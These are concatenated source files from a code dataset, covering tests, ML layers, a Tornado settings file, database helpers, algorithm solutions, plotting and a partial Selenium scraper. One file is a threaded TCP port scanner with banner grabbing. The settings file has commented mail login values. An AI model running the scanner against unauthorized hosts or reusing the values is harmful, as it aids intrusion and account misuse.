= self.getEvent('event1')\n event2 = self.getEvent('event2')\n\n self.manager.add(self.athlete_key, event1)\n self.manager.add(self.athlete_key, event2)\n\n loc_key = self.athlete_key.get().location\n result = self.manager.listByLocation(loc_key)\n\n self.assertEqual(2, len(result))\n self.assertEqual('event1', result[0].name)\n self.assertEqual('event2', result[1].name)\n\n def test_get_by_name(self):\n event = self.getEvent('HelloWorld')\n\n orig_key = self.manager.add(self.athlete_key, event)\n result = self.manager.getByName('HelloWorld')\n\n self.assertEqual(result.name, 'HelloWorld')\n self.assertEqual(orig_key, result.key)\n\n def validateEvent(self, result, event):\n self.assertEqual(result.name, event['name'])\n self.assertEqual(result.description, event['description'])\n self.assertEqual(result.distance, event['distance'])\n self.assertEqual(result.difficulty, event['difficulty'])\n self.assertEqual(result.date.strftime('%m/%d/%Y'), event['date'])\n\n def getEvent(self, name=None, descr=None, date=None, coords=None):\n return {\n 'name': name,\n 'description': 'sample descr' if descr is None else descr,\n 'date': '12/16/2018' if date is None else date,\n 'start_coord': '16.489,23.785' if coords is None else coords,\n 'distance': 46,\n 'difficulty': 6\n }","sub_path":"repository/test_repository/test_eventmanager.py","file_name":"test_eventmanager.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1810301","text":"import socket\r\nimport time\r\nimport random\r\nimport json\r\nfrom random import seed\r\nfrom datetime import datetime\r\nimport pytz\r\n# create TCP/IP socket\r\n\r\n\r\n\r\nfrom tkinter import *\r\n\r\nwindow = Tk()\r\n\r\nwindow.title(\"Welcome to e-health Tracker\")\r\n\r\nwindow.geometry('350x200')\r\n\r\nlbl = Label(window, text=\"Hello\",bg=\"blue\")\r\n\r\nlbl.grid(column=0, row=0)\r\n\r\ndef clicked():\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n i=0\r\n# retrieve local hostname\r\n local_hostname = socket.gethostname()\r\n\r\n# get fully qualified hostname\r\n local_fqdn = socket.getfqdn()\r\n\r\n# get the according IP address\r\n ip_address = socket.gethostbyname(local_hostname)\r\n\r\n# bind the socket to the port 23456, and connect\r\n server_address = (ip_address, 9999)\r\n sock.connect(server_address)\r\n print (\"connecting to %s (%s) with %s\" % (local_hostname, local_fqdn, ip_address))\r\n\r\n\r\n IDi = random.randint(1,100)\r\n Systolici = random.randint(110,140)\r\n Diastolici =random.randint(70,120)\r\n Pulsei= random.randint(60,100)\r\n Timei= time.asctime(time.localtime(time.time()))\r\n Tempi= random.randint(34,40)\r\n Oxygeni=random.randint(90,105)\r\n\r\n records ={\r\n \"ID\": 12,\r\n \"Systolic\":Systolici,\r\n \"Diastolic\":Diastolici,\r\n \"Pulse\": Pulsei ,\r\n \"Time\": Timei,\r\n \"Temp\":Tempi,\r\n \"Oxygen\":Oxygeni\r\n }\r\n\r\n\r\n\r\n \r\n# Using list comprehension \r\n# Get values of particular key in list of dictionaries \r\n\r\n print('mesure',records)\r\n json_object = json.dumps( records, indent=4)\r\n print(\"json\",json_object)\r\n lbl.configure(text=str(json_object))\r\n#for entry in records:\r\n# print (\" %s\" % records[entry])\r\n#new_data = ( \"%s\" % records).encode(\"utf-8\")\r\n new_data = ( \"%s\" % json_object).encode(\"utf-8\")\r\n sock.sendall(new_data)\r\n \r\n # wait for two seconds\r\n#selfy = sock.recv(1024)\r\n#print(str(selfy))\r\n time.sleep(2)\r\n\r\n# close connection\r\n sock.close()\r\n\r\n \r\n\r\nbtn = Button(window, text=\"New Measurement\",bg=\"yellow\", command=clicked)\r\n\r\nbtn.grid(column=1, row=0)\r\n\r\nwindow.mainloop()\r\n","sub_path":"e-healthTrackerDeviceclient.py","file_name":"e-healthTrackerDeviceclient.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"366200254","text":"import argparse\nimport socket\nfrom socket import *\nfrom threading import Thread, Semaphore\n\nscreenlock = Semaphore(value=1)\n\ndef conScan(hostname, port):\n\ttry:\n\t\tconn = socket(AF_INET, SOCK_STREAM)\n\t\tconn.connect((hostname, port))\n\t\tconn.send(\"This is just a test\")\n\t\tresult = conn.recv(1000)\n\t\tscreenlock.acquire()\n\t\tprint(\"[+] {}/tcp open\".format(port))\n\t\tprint(\"[+] {}\".format(result))\n\texcept Exception as e:\n\t\tscreenlock.acquire()\n\t\tprint(\"[+] {}/tcp closed\".format(port))\n\tfinally:\n\t\tscreenlock.release()\n\t\tconn.close()\n\ndef portScan(hostname, ports):\n\ttry:\n\t\tip = gethostbyname(hostname)\n\t\tprint(\"[+] Found ip {} for {}\".format(ip, hostname))\n\t\taddr = gethostbyaddr(ip)\n\t\tprint(\"[+] Found actual hostname {}\".format(addr[0]))\n\t\tprint(\"[+] Alternative hostnames {}\".format(addr[1]))\n\t\tprint(\"[+] IPV4/V6 addresses {}\".format(addr[2]))\n\texcept Exception as e:\n\t\tprint(\"[-] Cannot resolve {}\".format(hostname))\n\t\treturn\n\tsetdefaulttimeout(10)\n\tfor port in ports:\n\t\tprint(\"[*] Scanning port : {}\".format(port))\n\t\tt = Thread(target=conScan, args=(hostname, port))\n\t\tt.start()\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-H\", \"--hostname\", type=str, help=\"[*] This is hostname\")\n\tparser.add_argument(\"-p\", \"--ports\", type=str, help=\"[*] These are ports\")\n\targs = parser.parse_args()\n\tif args.hostname == None or args.ports == None:\n\t\tif args.hostname == None:\n\t\t\tprint(\"[-] Hostname is required\")\n\t\tif args.ports == None:\n\t\t\tprint(\"[-] Ports are required\")\n\t\treturn\n\thostname = args.hostname\n\tports = [int(i) for i in args.ports.split(\", \")]\n\tportScan(hostname, ports)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Python/Pen Test/Penetration Test.py","file_name":"Penetration Test.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"555979820","text":"from itertools import product\n\nfrom torch import Tensor\n\nfrom torch_kalman.covariance import Covariance\nfrom torch_kalman.kalman_filter import KalmanFilter\nfrom torch_kalman.tests import TestCaseTK, simple_mv_velocity_design, name_to_proc\n\nimport numpy as np\nfrom filterpy.kalman import KalmanFilter as filterpy_KalmanFilter\n\n\nclass TestKalmanFilter(TestCaseTK):\n season_start = '2010-01-04'\n\n def test_complex_kf_init(self):\n proc_specs = {'hour_in_day': {'K': 3},\n 'day_in_year': {'K': 3},\n 'local_level': {'decay': (.33, .95)},\n 'local_trend': {'decay_position': (0.95, 1.00), 'decay_velocity': (0.90, 1.00)}\n }\n processes = []\n for id, pkwargs in proc_specs.items():\n processes.append(name_to_proc(id, **pkwargs))\n processes[-1].add_measure('measure')\n\n kf = KalmanFilter(measures=['measure'], processes=processes)\n\n def test_equations(self):\n data = Tensor([[-50., 50., 1.]])[:, :, None]\n\n #\n design = simple_mv_velocity_design(dims=1)\n batch_design = design.for_batch(1, 1)\n torch_kf = KalmanFilter(processes=design.processes.values(), measures=design.measures)\n pred = torch_kf(data)\n\n #\n filter_kf = filterpy_KalmanFilter(dim_x=2, dim_z=1)\n filter_kf.x = torch_kf.design.init_state_mean_params.detach().numpy()[:, None]\n filter_kf.P = Covariance.from_log_cholesky(torch_kf.design.init_cholesky_log_diag,\n torch_kf.design.init_cholesky_off_diag).detach().numpy()\n\n filter_kf.F = batch_design.F(0)[0].detach().numpy()\n filter_kf.H = batch_design.H(0)[0].detach().numpy()\n filter_kf.R = batch_design.R(0)[0].detach().numpy()\n filter_kf.Q = batch_design.Q(0)[0].detach().numpy()\n filter_kf.states = []\n for t in range(data.shape[1]):\n filter_kf.states.append(filter_kf.x)\n filter_kf.update(data[:, t, :])\n filter_kf.predict()\n filterpy_states = np.stack(filter_kf.states).squeeze()\n kf_states = pred.means.detach().numpy().squeeze()\n\n for r, c in product(*[range(x) for x in kf_states.shape]):\n self.assertAlmostEqual(filterpy_states[r, c], kf_states[r, c], places=3)\n","sub_path":"torch_kalman/tests/test_kalman_filter.py","file_name":"test_kalman_filter.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569746087","text":"import numpy as np\n\ndef position_value(terrain, altitude, reward_dict, probability_dict):\n damage_probability = probability_dict['damage_probability'][altitude]\n if terrain in probability_dict['stuck_probability'].keys():\n stuck_probability = probability_dict['stuck_probability'][terrain]\n else:\n stuck_probability = 0.0\n if terrain in probability_dict['sunk_probability'].keys():\n sunk_probability = probability_dict['sunk_probability'][terrain]\n else:\n sunk_probability = 0.0\n damaged = np.random.random() < damage_probability\n stuck = np.random.random() < stuck_probability\n sunk = np.random.random() < sunk_probability\n package_state = 'DAMAGED' if damaged else 'OK'\n package_state += '_STUCK' if stuck else ''\n package_state += '_SUNK' if sunk else ''\n #print(\"Package state:\", package_state)\n reward = reward_dict[package_state]\n return reward\n","sub_path":"build/lib/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"540857691","text":"#!/usr/bin/env python\n\n# Based on http://deeplearning.net/tutorial/code/mlp.py\nimport numpy\nimport theano\nimport theano.tensor as T\n\nclass NNLayer(object):\n\tdef __init__(self, rng, parent, n_in, n_out, weight=None, bias=None, activation=T.tanh):\n\t\t\"\"\"\n\t\tLayer of a neural network using theano\n\n\t\t:type rng: numpy.random.RandomState\n\t\t:param rng: a random number generator used to initialize weights\n\n\t\t:type input: theano.tensor.dmatrix\n\t\t:param input: a symbolic tensor of shape (n_examples, n_in)\n\n\t\t:type n_in: int\n\t\t:param n_in: dimensionality of input\n\n\t\t:type n_out: int\n\t\t:param n_out: number of hidden units\n\n \t\t:type activation: theano.Op or function\n\t\t:param activation: Non linearity to be applied in the hidden\n\t\tlayer\n\t\t\"\"\"\n\t\tself.parent = parent\n\t\tself.activation = activation\n\n\t\t# `W` is initialized with `W_values` which is uniformely sampled\n\t\t# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))\n\t\t# for tanh activation function\n\t\t# the output of uniform if converted using asarray to dtype\n\t\t# theano.config.floatX so that the code is runable on GPU\n\t\t# Note : optimal initialization of weights is dependent on the\n\t\t# activation function used (among other things).\n\t\t# For example, results presented in [Xavier10] suggest that you\n\t\t# should use 4 times larger initial weights for sigmoid\n\t\t# compared to tanh\n\t\t# We have no info for other function, so we use the same as\n\t\t# tanh.\n\t\tif weight is None:\n\t\t\tweight_values = numpy.asarray(\n\t\t\t\trng.uniform(\n\t\t\t\t\tlow=-numpy.sqrt(6. / (n_in + n_out)),\n\t\t\t\t\thigh=numpy.sqrt(6. / (n_in + n_out)),\n\t\t\t\t\tsize=(n_in, n_out)\n\t\t\t\t),\n\t\t\t\tdtype=theano.config.floatX\n\t\t\t)\n\t\t\t# multiple W-values by 4 if it's the sigmoid function\n\t\t\tif activation == theano.tensor.nnet.sigmoid:\n\t\t\t\tweight_values *= 4\n\t\t\telif activation == None:\n\t\t\t\tweight_values *= 0\n\n\t\t\tweight = theano.shared(value=weight_values, name='weight', borrow=True)\n\n\t\tif bias is None:\n\t\t\tbias_values = numpy.zeros((n_out,), dtype=theano.config.floatX)\n\t\t\tbias = theano.shared(value=bias_values, name='bias', borrow=True)\n\n\t\tself.weight = weight\n\t\tself.bias = bias\n\n\t\t# if (self.parent != None):\n\t\t# \tlin_output = T.dot(self.parent.getOutput(state_action), self.weight) + self.bias\n\t\t# else:\n\t\t# \tlin_output = T.dot(state_action, self.weight) + self.bias\n\t\t# self.output = (\n\t\t# \tlin_output if activation is None\t# if no activation function, output is linear weight*input + bias\n\t\t# \telse activation(lin_output)\t\t# otherwise use the activation function\n\t\t# )\n\t\t# parameters of the model\n\t\tself.params = [self.weight, self.bias]\n\n\tdef getOutput(self, state_action):\n\t\tif (self.parent != None):\n\t\t\tlin_output = T.dot(self.parent.getOutput(state_action), self.weight) + self.bias\n\t\telse:\n\t\t\tlin_output = T.dot(state_action, self.weight) + self.bias\n\n\t\treturn lin_output if self.activation is None else self.activation(lin_output)\n","sub_path":"src/q_learning/src/q_learning/neural_network/nn_layer/NNLayer.py","file_name":"NNLayer.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"89651322","text":"from typing import *\n\nimport torch\nfrom torch import nn\n\nfrom torchlearn.utils import default_device\n\n\nclass MLP(nn.Module):\n \"\"\"Multi-layer perceptron model\"\"\"\n\n def __init__(self, input_dim: int, hidden_dims: List[int]=None, output_dim: int=1, device: str=default_device()):\n super(MLP, self).__init__()\n self.inp_dim = input_dim\n self.hidden_dims = hidden_dims\n self.outp_dim = output_dim\n self.device = device\n\n if not hidden_dims:\n raise AttributeError(f'Invalid value of hidden_dims = {hidden_dims}, must contain at least one dimension!')\n\n self.inp_layer = nn.Linear(in_features=input_dim, out_features=hidden_dims[0])\n\n self.hidden_layers_ = nn.ModuleList()\n for inp_dim, outp_dim in zip(self.hidden_dims[:-1], self.hidden_dims[1:]):\n layer = nn.Linear(in_features=inp_dim, out_features=outp_dim)\n nn.init.xavier_uniform_(layer.weight)\n self.hidden_layers_.append(layer)\n\n self.outp_layer = nn.Linear(in_features=hidden_dims[-1], out_features=output_dim)\n\n self.dropout_ = nn.ModuleList()\n self.batch_norm_ = nn.ModuleList()\n self.batch_norm_.append(nn.BatchNorm1d(num_features=self.inp_layer.out_features))\n for layer in self.hidden_layers_:\n self.dropout_.append(nn.Dropout(p=0.2))\n self.batch_norm_.append(nn.BatchNorm1d(num_features=layer.out_features))\n\n self.activation_ = nn.ReLU()\n self.prediction_ = nn.Softmax() if output_dim > 1 else nn.Sigmoid()\n\n if self.device == 'cuda':\n self.inp_layer = self.inp_layer.cuda()\n self.hidden_layers_ = self.hidden_layers_.cuda()\n self.outp_layer = self.outp_layer.cuda()\n self.batch_norm_ = self.batch_norm_.cuda()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Estimate probability of x\"\"\"\n x = self.inp_layer(x)\n if x.shape[0] > 1:\n x = self.batch_norm_[0](x)\n for hidden, dropout, batch_norm in zip(self.hidden_layers_, self.dropout_, self.batch_norm_[1:]):\n x = dropout(self.activation_((hidden(x))))\n if x.shape[0] > 1:\n x = batch_norm(x)\n y = self.prediction_(self.outp_layer(x))\n return y\n","sub_path":"torchlearn/model/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"130401572","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2014-06-17 23:01:35\n# @Author : shitao.tommy (hero007asd@gmail.com)\n# @Link : http://example.org\n# @Version : $Id$\n\nDEBUG = True\nGZIP = True\n\n# SITE_WWW = 'http://www.iarlink.com:7000/'\n# SITE_STATIC = 'http://www.eyuanonline.com:7000/static/'\n# DOMAIN = '.eyuanonline.com'\n\n\n# DB_HOST= 'localhost'\n# DB_PORT= 3306\n# DB_USER = 'root'\n# DB_PASSWD = 'password'\n# DB_NAME = 'database'\n\n\n# REDIS_HOST= 'localhost'\n# REDIS_PORT= 3306\n# REDIS_USER = 'root'\n# REDIS_PASSWD = 'password'\n# REDIS_NAME = 'database'\n\nMEMCACHE_HOST = 'localhost:11211'\n\nADMIN_PAGESIZE = 20\n\n\nWEIBO_KEY = ''\nWEIBO_SECRET = ''\nWEIBO_REDIRECT = 'http://www.xxx.com/oauth/weibo'\n\nALIPAY_KEY = ''\nALIPAY_INPUT_CHARSET = 'utf-8'\nALIPAY_PARTNER = ''\nALIPAY_SELLER_EMAIL = ''\nALIPAY_SIGN_TYPE = 'MD5'\nALIPAY_AUTH_URL='http://www.xxx.com/oauth/alipay_return'\nALIPAY_RETURN_URL='http://www.xxx.com/alipay/return'\nALIPAY_NOTIFY_URL='http://www.xxx.com/alipay/notify'\nALIPAY_SHOW_URL=''\nALIPAY_TRANSPORT='https'\n\nSMS_KEY = 0\nSMS_SECRET = ''\nSMS_GATEWAY = 'http://sms.bechtech.cn/Api/send/data/json'\n\n# Queue、gearman、\n\n# Redis\n\n# Sentry\n\n# log\nLOG_PATH = '../log/'\nLOG_NAME = 'tornado_log'\nACCESS_LOG = 'access'\nAPI_LOG = 'api'\nSQL_LOG = 'sql'\nERR_LOG = 'error'\n\n#upload\nUPLOAD_PATH = '../upload/'\n\n#mail\n# MAIL_HOST = 'smtp.qq.com'\n# MAIL_USER = '417732702'\n# MAIL_PASS = 'hero007asd@163.com'\n# MAIL_POSTFIX = 'qq.com'","sub_path":"src/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278773170","text":"import DBService\nfrom forums_API.dataService.functions import create_JSON, tuple2list\n\n\ndef save_user(email, username, about, name, optional):\n isAnonymous = 0\n if \"isAnonymous\" in optional:\n isAnonymous = optional[\"isAnonymous\"]\n id = DBService.exec_update('INSERT INTO Users (email, about, name, username, isAnonymous) VALUES (%s, %s, %s, %s, %s)',\n (email, about, name, username, isAnonymous, ))\n return create_JSON(\"user\", [about, email, id, isAnonymous, name, username])\n\n# Users.email\ndef update_user(email, about, name):\n db = DBService.get_connection()\n con = db[\"con\"]\n cursor = db[\"cursor\"]\n con.begin()\n cursor.execute('UPDATE Users SET about = %s, name = %s WHERE email = %s',\n (about, name, email, ))\n con.commit()\n user = details_with_cursor(cursor, email)\n DBService.close_connection(db[\"con\"], db[\"cursor\"])\n return user\n\n# Followers.followee/follower, Subscriptions.user_id, Users.email, Users.id, Users.(email, id)\ndef details(email):\n db = DBService.get_connection()\n\n user = details_with_cursor(db[\"cursor\"], email)\n\n DBService.close_connection(db[\"con\"], db[\"cursor\"])\n return user\n\n\n#-----------------------------------------------------------------------------------------------------------\n\n\ndef user_describe(user):\n user_response = {\n 'about': user[1],\n 'email': user[0],\n 'id': user[3],\n 'isAnonymous': bool(user[2]),\n 'name': user[4],\n 'username': user[5]\n }\n return user_response\n\n\ndef get_userID_by_email(cursor, email):\n cursor.execute(\"SELECT id FROM Users WHERE email = %s\", (email, ))\n result = cursor.fetchall()\n return result[0][0]\n\n\ndef details_with_cursor(cursor, email):\n if type(email) is not int and type(email) is not long:\n cursor.execute(\"SELECT id FROM Users WHERE email = %s\", (email, ))\n result = cursor.fetchall()\n id = result[0][0]\n else:\n id = email\n\n query = 'select email, about, isAnonymous, Users.id, name, username, ' \\\n 'group_concat(distinct thread) ' \\\n 'FROM Users JOIN Subscriptions ON Users.id = Subscriptions.user_id ' \\\n 'where id = %s'\n cursor.execute(query, (id, ))\n result = cursor.fetchall()\n\n user = user_describe(result[0])\n user[\"subscriptions\"] = []\n if result[0][6] is not None:\n user[\"subscriptions\"] = map(int, result[0][6].split(','))\n\n followers = 'SELECT email FROM Users JOIN Followers ON Users.id = follower ' \\\n 'WHERE followee = %s'\n cursor.execute(followers, (id, ))\n result = cursor.fetchall()\n user[\"followers\"] = tuple2list(result)\n\n following = 'SELECT email FROM Users JOIN Followers ON Users.id = followee ' \\\n 'WHERE follower = %s'\n cursor.execute(following, (id, ))\n result = cursor.fetchall()\n user[\"following\"] = tuple2list(result)\n return user","sub_path":"forums_API/dataService/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216330708","text":"def count_boolean(b1, b2, b3) :\n a = [b1, b2, b3]\n count = 0\n i = 0\n for i in a :\n if i == \"True\" :\n count += 1\n i += 1\n if count >= 2:\n return True\n else :\n return False\n","sub_path":"BooleanCount.py","file_name":"BooleanCount.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48833042","text":"#!/usr/bin/python3\nimport sys, getopt\nfrom csv_libPlot_Profile import *\n\ndef main(argv) :\n\n # PATHS\n ###########\n\n HOME = \"/Users/Arthur/\"\n PATH = HOME + \"Documents/UPMC/These/Codes/multilayerSingle/example/Well-Balance/Asymptotic/Womersley/\"\n PATHWB = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/\"\n\n\n PATHWOM_20 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=20/\"\n PATHWOM_15 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=15/\"\n PATHWOM_10 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=10/\"\n PATHWOM_5 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=5/\"\n\n # FILE :\n ###########\n dataName = \"Artery_0_t_r_Ux.csv\"\n\n nfig = 1\n\n dRstr = \"1e-3\"\n\n for Womstr in [\"5\", \"20\"] :\n\n #Choose Womersley number\n if (Womstr == \"5\") :\n PATHWOM = PATHWOM_5\n elif (Womstr == \"10\") :\n PATHWOM = PATHWOM_10\n elif (Womstr == \"15\") :\n PATHWOM = PATHWOM_15\n elif (Womstr == \"20\") :\n PATHWOM = PATHWOM_20\n\n J = \"1600\"\n La = \"128\"\n\n Wom = PATH + \"T_12/\" +\"a=\"+str(Womstr) + \"/\" + \"K=1.e4/\" + \"dR=\" + dRstr + \"/L=\" + str(La) + \"/Raf=0/J=\" +str(J) + \"/\" + \"HRQ/Order=1/KIN_HAT/Figures/\" + dataName\n WomWB = PATHWB + \"T_12/\" +\"a=\"+str(Womstr) + \"/\" + \"K=1.e4/\" + \"dR=\" + dRstr + \"/L=\" + str(La) + \"/Raf=0/J=\" +str(J) + \"/\" + \"HRQ/Order=1/KIN_HAT/Figures/\" + dataName\n\n # ANALYTIC\n ##########\n\n ANA = PATHWOM+\"womProfil.csv\"\n\n # PLOTING :\n ###########\n\n Store = PATH + \"T_12/\" +\"a=\"+str(Womstr)+\"/Figures/\"\n\n\n lCol = [\n \"black\",\"green\",\"blue\",\"red\",\n \"black\",\"green\",\"blue\",\"red\",\n \"black\",\"green\",\"blue\",\"red\"\n ]\n lMark = [\n \"\",\"\",\"\",\"\",\n \"o\",\"o\",\"o\",\"o\",\n \"^\",\"^\",\"^\",\"^\"\n ]\n lMarkSize = [\n 1,1,1,1,\n 7,7,7,7,\n 7,7,7,7\n ]\n lMarkWidth = [\n 1,1,1,1,\n 1,1,1,1,\n 1,1,1,1\n ]\n MarkPoints = 45\n lLineSize = [\n 2,2,2,2,\n 1,1,1,1,\n 1,1,1,1\n ]\n lStyle = [\n \"-\",\"-\",\"-\",\"-\",\n \"\",\"\",\"\",\"\",\n \"\",\"\",\"\",\"\"\n ]\n\n lAlpha = [\n 1,1,1,1,\n 0.7,0.7,0.7,0.7,\n 0.7,0.7,0.7,0.7\n ]\n\n liX = [\n 1,2,3,4,\n 1,2,3,4,\n 1,2,3,4\n ]\n\n liY= [\n 0,0,0,0,\n 0,0,0,0,\n 0,0,0,0\n ]\n\n xLabel=r\"$U_x$ ($\\frac{cm}{s}$)\"\n yLabel = r\"$\\frac{r}{R}$\"\n\n lTextPos = [[0.02,0.05],[0.53,0.05],[0.64,0.05],[0.72,0.05],[0.8,0.05],[0.88,0.05],[0.96,0.05]]\n lText = [r\"$N$=$1600$, $L$=$128$\",r\"$t$=[\",r\"0.2,\",r\"0.4,\",r\"0.5,\",\"0.7\",r\"]$T$\"]\n lTextAlign = [\"left\",\"left\",\"center\",\"center\",\"center\",\"center\",\"right\"]\n lTextColor = [\"black\",\"black\",\"black\",\"green\",\"blue\",\"red\",\"black\"]\n LegPos = 12\n lLabel = [\n r\"$Analylic$\",\"\",\"\",\"\",\n r\"$Single$\",\"\",\"\",\"\",\n r\"$WB$\",\"\",\"\",\"\"\n ]\n\n title = \"Prof_Ux_Wom_\"+str(Womstr) + \"_O1_x_25_J_\"+str(J)+\".pdf\"\n lFile = [\n ANA,ANA,ANA,ANA,\n Wom,Wom,Wom,Wom,\n WomWB,WomWB,WomWB,WomWB\n ]\n\n nfig = plot_csv_Profile(\n pathStore=Store,title=title,lFile=lFile,\n liX=liX,liY=liY,\n xLabel=xLabel,yLabel=yLabel,lLabel=lLabel,LegPos=LegPos,\n lText=lText,lTextPos=lTextPos,lTextAlign=lTextAlign,lTextColor=lTextColor,\n lCol=lCol,lMark=lMark,\n lMarkSize=lMarkSize,lMarkWidth=lMarkWidth,MarkPoints=MarkPoints,\n lLineSize=lLineSize,lStyle=lStyle,lAlpha=lAlpha,nf=nfig)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"multilayer-Single/scripts/Asymptotic/Womersley/validationProfile.py","file_name":"validationProfile.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311156222","text":"class Point:\n ''' The \"__init__(self,*other)\" function initializes all variables\n that will be used in the class, it essentially makes the object '''\n def __init__(self,x=0,y=0):\n self.x = x\n self.y = y\n ''' When we print an instance of this class, we get a messy format of the\n form \"<__main__.Point object at 0x00000000031F8CC0>\" which is not helpful\n and so we can write a special function that will indicate how we want\n to print the instance '''\n def __str__(self):\n return \"({0},{1})\".format(self.x,self.y)\n ''' Now there are special features you can give objects, such as when ever\n you add or multply two objects of the same class, the object has a special\n built in function that says what to do, which makes writing codes easier.\n There are a bunch of these \"Overload\" functions you can look up. They all\n start with a \"__\" and end with a \"__\" like the __init__ and __str__ functions.'''\n def __add__(self,other):\n x = self.x + other.x\n y = self.y + other.y\n return Point(x,y)\n def __mul__(self,other):\n x = self.x * other.x\n y = self.y * other.y\n return Point(x,y)\n \n \n\n\n# Create the Point object called p1\np1 = Point(1,3)\np2 = Point(1,1)\n# Print in the format we have designed\nprint(p1)\nprint(p2)\n# Use the \"__add__\" function\np3 = p1 + p2\nprint(p3)\n# Use the \"__mul__\" function\np4 = p1 * p2\nprint(p4)\n\n\n\n","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522357645","text":"# https://codeforces.com/problemset/problem/1221/D\n\n\ndef helper(h1, h2, h3, a, b, c, h):\n mini = 2 * (10 ** 18)\n if h1 != h:\n mini = min(mini, a)\n if h2 != h:\n mini = min(mini, b)\n if h3 != h:\n mini = min(mini, c)\n return mini\n\n\ndef great_fence_cost(n, h, p):\n a = 0\n b = p[0]\n c = p[0] * 2\n for i in range(1, n):\n a_new = helper(h[i - 1], h[i - 1] + 1, h[i - 1] + 2, a, b, c, h[i]) + 0\n b_new = helper(h[i - 1], h[i - 1] + 1, h[i - 1] + 2, a, b, c, h[i] + 1) + p[i] * 1\n c_new = helper(h[i - 1], h[i - 1] + 1, h[i - 1] + 2, a, b, c, h[i] + 2) + p[i] * 2\n a = a_new\n b = b_new\n c = c_new\n return min(a, b, c)\n\n\ndef solve():\n query_number = int(input())\n for k in range(query_number):\n n = int(input())\n h = [0] * n\n p = [0] * n\n for j in range(n):\n h[j], p[j] = list(map(int, input().split(\" \")))\n print(great_fence_cost(n, h, p))\n\n\nif __name__ == '__main__':\n solve()\n","sub_path":"crackinginterview-source/algo/codeforces/ecr73/d_make_fence_great_again/d_make_fence_great_againV3.py","file_name":"d_make_fence_great_againV3.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"17893878","text":"#Lowest Common Ancestor of a Binary Search Tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root, p, q):\n node = root\n while node:\n parent = node\n if p.val > parent.val and q.val > parent.val:\n node = root.left\n elif p.val < parent.val and q.val < parent.val:\n node = root.right\n else:\n return node\n\nclass Solution:\n\n def lowestCommonAncestor(self, root, p, q):\n if p.val > root.val and q.val > root.val:\n return self.lowestCommonAncestor(root.right, p, q)\n elif p.val < root.val and q.val < root.val:\n return self.lowestCommonAncestor(root.left, p, q)\n else:\n return root","sub_path":"trees/lca_bst.py","file_name":"lca_bst.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282747543","text":"import pandas\nimport requests\nimport time\nimport xlsxwriter\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\n# from selenium.webdriver.chrome.options import Options\n\n\n# initialize webdriver\ndriver = webdriver.Safari()\ndriver.implicitly_wait(10)\n\n\"\"\"\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n\ndriver = webdriver.Chrome(options = chrome_options)\n\"\"\"\n\n\n# load unissu main page\ndef open_main_page():\n url = \"https://www.unissu.com/proptech-companies\"\n driver.get(url)\n driver.find_element_by_css_selector(\"title\")\n\n\n# close pop-up if necessary\ndef close_popup():\n try:\n modal = driver.find_element_by_css_selector(\"div[class*='modalClose']\")\n modal.click()\n except NoSuchElementException:\n pass\n\n\n# load all companies\ndef load_companies():\n while True:\n try:\n load_more = driver.find_element_by_css_selector(\".loadMoreButton button\")\n load_more.click()\n except NoSuchElementException:\n return\n\n\n# get links of all companies' profiles from main page\ndef get_companies_links():\n companies = []\n company_elems = 